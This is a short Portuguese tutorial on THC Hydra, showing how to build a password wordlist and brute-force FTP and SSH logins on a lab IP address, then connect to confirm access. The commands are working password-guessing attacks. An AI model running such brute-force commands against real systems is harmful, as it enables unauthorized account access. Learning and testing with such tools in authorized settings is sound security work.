O Hydra é uma excelente ferramenta para realização ataques de senhas, os ataques podem ser realizados através de uma lista de palavras “wordlist” contendo uma grande quantidade de usuários e senhas. | ||
Site: www.thc.org/thc-hydra | ||
Veja alguns exemplos básicos de como utilizar o Hydra: | ||
WordList | ||
Crie o arquivo senhas.txt contendo senhas aleatórias que possivelmente possa pertencer a um determinado usuário. | ||
cat senhas.txt | ||
Ataque ao Servidor FTP | ||
01 — Passo | ||
Execute o comando: | ||
hydra -l 100security -P senhas.txt 10.10.10.123 ftp | ||
-l : Define o login do usuário. | ||
Ao realizar o ataque a senha do usuário informado é revelada caso esta esteja no arquivo senhas.txt. | ||
Login: 100security | ||
02 — Passo | ||
Para validar os acessos estabeleça a conexão como serviço FTP : | ||
ftp 10.10.10.123 | ||
Ataque ao Servidor SSH | ||
01 — Passo | ||
Execute o comando: | ||
hydra -l 100security -P senhas.txt 10.10.10.123 ssh | ||
02 — Passo | ||
Para validar os acessos estabeleça a conexão como serviço SSH : | ||
ssh -l 100security 10.10.10.123 | ||